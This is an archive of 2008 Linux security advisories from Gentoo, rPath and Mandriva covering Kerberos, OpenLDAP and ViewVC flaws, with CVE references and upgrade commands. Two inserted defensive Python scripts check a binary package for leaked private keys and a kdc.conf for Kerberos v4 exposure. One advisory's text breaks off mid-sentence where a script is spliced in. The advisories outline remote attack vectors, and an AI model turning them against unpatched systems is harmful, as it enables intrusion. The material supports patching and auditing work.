# emerge --ask --oneshot --verbose ">=mail-mta/postfix-2.2.11-r1"

All Netkit FTP Server users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-ftp/netkit-ftpd-0.17-r7"

All ejabberd users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-im/ejabberd-1.1.3"

All UnrealIRCd users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-irc/unrealircd-3.2.7-r2"

All Cyrus IMAP Server users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-mail/cyrus-imapd-2.3.9-r1"

All Dovecot users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-mail/dovecot-1.0.10"

All stunnel 4 users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-misc/stunnel-4.21"

All InterNetNews users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-nntp/inn-2.4.3-r1"

References
==

  [ 1 ] CVE-2008-1383
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1383

Availability


This GLSA and any updates to it are available for 

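A defender-side check for the impact described in GLSA 200803-30 above, as an added example that is not Gentoo's code: it scans a binpkg's tar payload for PEM private-key headers, the material that leaks when docert() runs during src_install(). Assumptions: the input is the plain tar.bz2 payload (a real .tbz2 also carries an xpak trailer appended after the bzip2 stream, which must be stripped first, for instance with qtbz2 from portage-utils); the archive and the "key" built below are constructed placeholders.

```python
"""Scan a Gentoo binpkg's tar payload for embedded PEM private keys.

Added example, not Gentoo's code.  It looks for the GLSA 200803-30 failure
mode: an ebuild that ran docert() during src_install() leaves the generated
key in the binary package.  Assumptions: the input is the plain tar.bz2
payload (a real .tbz2 also carries an xpak trailer that must be stripped
first); the archive and the "key" built below are constructed placeholders.
"""
import io
import re
import tarfile

# Any PEM private-key header: "PRIVATE KEY", "RSA PRIVATE KEY",
# "EC PRIVATE KEY", "ENCRYPTED PRIVATE KEY", ...
KEY_HEADER_RE = re.compile(rb"-----BEGIN (?:[A-Z ]+ )?PRIVATE KEY-----")
# Keys and certs are small; skip large members so binaries are not read.
MAX_INSPECT_BYTES = 64 * 1024


def find_private_keys(tar_bytes):
    """Return the sorted member names whose content carries a PEM key header."""
    hits = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tf:
        for member in tf:
            if not member.isfile() or member.size > MAX_INSPECT_BYTES:
                continue
            fobj = tf.extractfile(member)
            if fobj is not None and KEY_HEADER_RE.search(fobj.read()):
                hits.append(member.name)
    return sorted(hits)


def _add_member(tf, name, data, mode=0o644):
    """Append an in-memory regular file to an open tar archive."""
    info = tarfile.TarInfo(name)
    info.size = len(data)
    info.mode = mode
    tf.addfile(info, io.BytesIO(data))


def build_sample_binpkg(include_key):
    """Constructed stand-in for a conserver binpkg, with or without a key."""
    fake_cert = (b"-----BEGIN CERTIFICATE-----\n"
                 b"PLACEHOLDER-NOT-A-REAL-CERT\n"
                 b"-----END CERTIFICATE-----\n")
    fake_key = (b"-----BEGIN RSA PRIVATE KEY-----\n"
                b"PLACEHOLDER-NOT-A-REAL-KEY\n"
                b"-----END RSA PRIVATE KEY-----\n")
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:bz2") as tf:
        _add_member(tf, "./etc/conserver/conserver.cf", b"# constructed\n")
        _add_member(tf, "./usr/sbin/conserver", b"\x7fELF" + b"\0" * 64, 0o755)
        # Shipping the public certificate is harmless; the key is what leaks.
        _add_member(tf, "./etc/ssl/conserver/conserver.crt", fake_cert)
        if include_key:
            _add_member(tf, "./etc/ssl/conserver/conserver.key", fake_key, 0o600)
    return buf.getvalue()


if __name__ == "__main__":
    for label, flag in (("leaky", True), ("clean", False)):
        print(label, find_private_keys(build_sample_binpkg(flag)))
```

A hit means the package must not be served from a public binhost and the key on the installing hosts should be regenerated, which matches the advisory's resolution step of removing the Portage-installed certificates before re-emerging.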
rPSA-2008-0112-1 krb5 krb5-server krb5-services krb5-test krb5-workstation

2008-03-20 Thread rPath Update Announcements
rPath Security Advisory: 2008-0112-1
Published: 2008-03-19
Products:
rPath Linux 1
rPath Appliance Platform Linux Service 1

Rating: Critical
Exposure Level Classification:
Remote Root Deterministic Unauthorized Access
Updated Versions:
[EMAIL PROTECTED]:1/1.4.1-7.9-1
[EMAIL PROTECTED]:1/1.4.1-7.9-1
[EMAIL PROTECTED]:1/1.4.1-7.9-1
[EMAIL PROTECTED]:1/1.4.1-7.9-1
[EMAIL PROTECTED]:1/1.4.1-7.9-1

rPath Issue Tracking System:
https://issues.rpath.com/browse/RPL-2012
https://issues.rpath.com/browse/RPL-2318

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5894
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5902
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5971
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0062
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0063
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0947

Description:
Previous versions of the krb5 package contain multiple
vulnerabilities, the most serious of which may allow a
remote attacker to execute arbitrary code.

http://wiki.rpath.com/Advisories:rPSA-2008-0112

Copyright 2008 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html


[ MDVSA-2008:071 ] - Updated Kerberos packages fix multiple vulnerabilities

2008-03-20 Thread security


 ___
 
 Mandriva Linux Security Advisory MDVSA-2008:071
 http://www.mandriva.com/security/
 ___
 
 Package : krb5
 Date: March 19, 2008
 Affected: Corporate 3.0, Multi Network Firewall 2.0
 ___
 
 Problem Description:
 
 A flaw was discovered in how the Kerberos krb5kdc handled Kerberos v4
 protocol packets.  An unauthenticated remote attacker could use this
 flaw to crash the krb5kdc daemon, disclose portions of its memory,
 or possibly execute arbitrary code using malformed or truncated
 Kerberos v4 protocol requests (CVE-2008-0062, CVE-2008-0063).
 
 This issue only affects krb5kdc when it has Kerberos v4 protocol
 compatibility enabled, which is a compiled-in default in all
 Kerberos versions that Mandriva Linux ships prior to Mandriva
 Linux 2008.0.  Kerberos v4 protocol support can be disabled by
 adding v4_mode=none (without quotes) to the [kdcdefaults] section
 of /etc/kerberos/krb5kdc/kdc.conf.
 
 The updated packages have been patched to correct these issues.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0062
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0063
 http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2008-001.txt
 ___
 
 Updated Packages:
 
 Corporate 3.0:

 Corporate 3.0/X86_64:

 Multi Network Firewall 2.0:
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  

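The Mandriva advisories above give one mitigation for the krb5kdc v4 issues (CVE-2008-0062, CVE-2008-0063): v4_mode=none in the [kdcdefaults] section of kdc.conf. The checker below is an added example, not Mandriva's or MIT's code; it parses kdc.conf's brace-nested format, reports whether v4 compatibility is still on, and follows the advisory's statement that on the affected releases an absent v4_mode line means the compiled-in default (enabled). Both configs are constructed samples.

```python
"""Report whether a kdc.conf still leaves Kerberos v4 compatibility on.

Added example, not Mandriva's or MIT's code.  It checks for the one
setting the advisory gives, v4_mode=none in [kdcdefaults], and follows
the advisory's statement that on the affected Mandriva releases v4
support is enabled by compiled-in default when the line is absent.
The two configs below are constructed samples.
"""
import re

SECTION_RE = re.compile(r"^\s*\[(\w+)\]\s*$")
ASSIGN_RE = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$")

# Constructed: v4_mode is missing from [kdcdefaults].  The copy inside the
# realm block does not count; the advisory names [kdcdefaults] only.
WEAK_KDC_CONF = """\
[kdcdefaults]
    kdc_ports = 88,750

[realms]
    EXAMPLE.COM = {
        database_name = /var/kerberos/krb5kdc/principal
        v4_mode = none
    }
"""

# Constructed: the advisory's mitigation applied.
FIXED_KDC_CONF = """\
[kdcdefaults]
    kdc_ports = 88
    v4_mode = none      # disable Kerberos v4 protocol support

[realms]
    EXAMPLE.COM = {
        database_name = /var/kerberos/krb5kdc/principal
    }
"""


def kdcdefaults(conf_text):
    """Return top-level key/value pairs of the [kdcdefaults] section.

    kdc.conf is not plain INI: [realms] nests brace blocks, so the parser
    tracks the current section and the brace depth and records only
    assignments that sit directly under [kdcdefaults].
    """
    section, depth, values = None, 0, {}
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0]          # drop trailing comments
        if not line.strip():
            continue
        m = SECTION_RE.match(line)
        if m and depth == 0:
            section = m.group(1).lower()
            continue
        depth += line.count("{") - line.count("}")
        m = ASSIGN_RE.match(line)
        if m and section == "kdcdefaults" and depth == 0:
            values[m.group(1).lower()] = m.group(2)
    return values


def v4_compat_enabled(conf_text):
    """True unless [kdcdefaults] explicitly sets v4_mode = none."""
    mode = kdcdefaults(conf_text).get("v4_mode")
    return mode is None or mode.strip('"').lower() != "none"


if __name__ == "__main__":
    # On Mandriva the file is /etc/kerberos/krb5kdc/kdc.conf (per advisory).
    for name, conf in (("weak", WEAK_KDC_CONF), ("fixed", FIXED_KDC_CONF)):
        state = "ENABLED (exposed)" if v4_compat_enabled(conf) else "disabled"
        print(f"{name}: Kerberos v4 compatibility {state}")
```

Disabling v4 only closes the krb5kdc vector; the GSSAPI (CVE-2007-5971) and kadmind RPC (CVE-2008-0947) issues still require the updated packages.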


[ GLSA 200803-29 ] ViewVC: Multiple vulnerabilities

2008-03-20 Thread Tobias Heinlein
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200803-29
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: ViewVC: Multiple vulnerabilities
  Date: March 19, 2008
  Bugs: #212288
ID: 200803-29

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple security issues have been reported in ViewVC, which can be
exploited by malicious people to bypass certain security restrictions.

Background
==

ViewVC is a browser interface for CVS and Subversion version control
repositories.

Affected packages
=

---
 Package  /  Vulnerable  /  Unaffected
---
  1  www-apps/viewvc   < 1.05  >= 1.05

Description
===

Multiple unspecified errors were reportedly fixed by the ViewVC
development team.

Impact
==

A remote attacker could send a specially crafted URL to the server to
list CVS or SVN commits on "all-forbidden" files, access hidden CVSROOT
folders, and view restricted content via the revision view, the log
history, or the diff view.

Workaround
==

There is no known workaround at this time.

Resolution
==

All ViewVC users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=www-apps/viewvc-1.05"

References
==

  [ 1 ] CVE-2008-1290
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1290
  [ 2 ] CVE-2008-1291
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1291
  [ 3 ] CVE-2008-1292
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1292

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200803-29.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5






[ MDVSA-2008:070 ] - Updated Kerberos packages fix multiple vulnerabilities

2008-03-20 Thread security


 ___
 
 Mandriva Linux Security Advisory MDVSA-2008:070
 http://www.mandriva.com/security/
 ___
 
 Package : krb5
 Date: March 19, 2008
 Affected: 2007.0, Corporate 4.0
 ___
 
 Problem Description:
 
 A memory management flaw was found in the GSSAPI library used by
 Kerberos that could result in an attempt to free already freed memory,
 possibly leading to a crash or allowing the execution of arbitrary code
 (CVE-2007-5971).
 
 A flaw was discovered in how the Kerberos krb5kdc handled Kerberos v4
 protocol packets.  An unauthenticated remote attacker could use this
 flaw to crash the krb5kdc daemon, disclose portions of its memory,
 or possibly execute arbitrary code using malformed or truncated
 Kerberos v4 protocol requests (CVE-2008-0062, CVE-2008-0063).
 
 This issue only affects krb5kdc when it has Kerberos v4 protocol
 compatibility enabled, which is a compiled-in default in all
 Kerberos versions that Mandriva Linux ships prior to Mandriva
 Linux 2008.0.  Kerberos v4 protocol support can be disabled by
 adding v4_mode=none (without quotes) to the [kdcdefaults] section
 of /etc/kerberos/krb5kdc/kdc.conf.
 
 A flaw in the RPC library as used in Kerberos' kadmind was discovered
 by Jeff Altman of Secure Endpoints.  An unauthenticated remote attacker
 could use this vulnerability to crash kadmind or possibly execute
 arbitrary code in systems with certain resource limits configured;
 this does not affect the default resource limits used by Mandriva Linux
 (CVE-2008-0947).
 
 The updated packages have been patched to correct these issues.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5971
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0062
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0063
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0947
 http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2008-001.txt
 http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2008-002.txt
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:

 Mandriva Linux 2007.0/X86_64:

 Corporate 4.0:

[ MDVSA-2008:069 ] - Updated Kerberos packages fix multiple vulnerabilities

2008-03-20 Thread security


 ___
 
 Mandriva Linux Security Advisory MDVSA-2008:069
 http://www.mandriva.com/security/
 ___
 
 Package : krb5
 Date: March 19, 2008
 Affected: 2007.1, 2008.0
 ___
 
 Problem Description:
 
 Multiple memory management flaws were found in the GSSAPI library
 used by Kerberos that could result in the use of already freed memory
 or an attempt to free already freed memory, possibly leading to a
 crash or allowing the execution of arbitrary code (CVE-2007-5901,
 CVE-2007-5971).
 
 A flaw was discovered in how the Kerberos krb5kdc handled Kerberos v4
 protocol packets.  An unauthenticated remote attacker could use this
 flaw to crash the krb5kdc daemon, disclose portions of its memory,
 or possibly execute arbitrary code using malformed or truncated
 Kerberos v4 protocol requests (CVE-2008-0062, CVE-2008-0063).
 
 This issue only affects krb5kdc when it has Kerberos v4 protocol
 compatibility enabled, which is a compiled-in default in all
 Kerberos versions that Mandriva Linux ships prior to Mandriva
 Linux 2008.0.  Kerberos v4 protocol support can be disabled by
 adding v4_mode=none (without quotes) to the [kdcdefaults] section
 of /etc/kerberos/krb5kdc/kdc.conf.
 
 A flaw in the RPC library as used in Kerberos' kadmind was discovered
 by Jeff Altman of Secure Endpoints.  An unauthenticated remote attacker
 could use this vulnerability to crash kadmind or possibly execute
 arbitrary code in systems with certain resource limits configured;
 this does not affect the default resource limits used by Mandriva Linux
 (CVE-2008-0947).
 
 The updated packages have been patched to correct these issues.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5901
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5971
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0062
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0063
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0947
 http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2008-001.txt
 http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2008-002.txt
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.1:

 Mandriva Linux 2007.1/X86_64:

 Mandriva Linux 2008.0:

[ GLSA 200803-28 ] OpenLDAP: Denial of Service vulnerabilities

2008-03-20 Thread Pierre-Yves Rofes

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200803-28
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: OpenLDAP: Denial of Service vulnerabilities
  Date: March 19, 2008
  Bugs: #197446, #209677
ID: 200803-28

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple Denial of Service vulnerabilities have been reported in
OpenLDAP.

Background
==

OpenLDAP Software is an open source implementation of the Lightweight
Directory Access Protocol.

Affected packages
=

---
 Package   /  Vulnerable  / Unaffected
---
  1  net-nds/openldap  < 2.3.41  >= 2.3.41

Description
===

The following errors have been discovered in OpenLDAP:

* Tony Blake discovered an error which exists within the
  normalisation of "objectClasses" (CVE-2007-5707).

* Thomas Sesselmann reported that, when running as a proxy-caching
  server, the "add_filter_attrs()" function in
  servers/slapd/overlay/pcache.c does not correctly NULL terminate
  "new_attrs" (CVE-2007-5708).

* A double-free bug exists in attrs_free() in the file
  servers/slapd/back-bdb/modrdn.c, which was discovered by Jonathan
  Clarke (CVE-2008-0658).

Impact
==

A remote attacker can cause a Denial of Service by sending a malformed
"objectClasses" attribute, via unknown vectors that prevent the
"new_attrs" array from being NULL terminated, or via a modrdn
operation with a NOOP (LDAP_X_NO_OPERATION) control.

Workaround
==

There is no known workaround at this time.

Resolution
==

All OpenLDAP users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-nds/openldap-2.3.41"

References
==

  [ 1 ] CVE-2007-5707
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5707
  [ 2 ] CVE-2007-5708
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5708
  [ 3 ] CVE-2008-0658
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0658

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200803-28.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5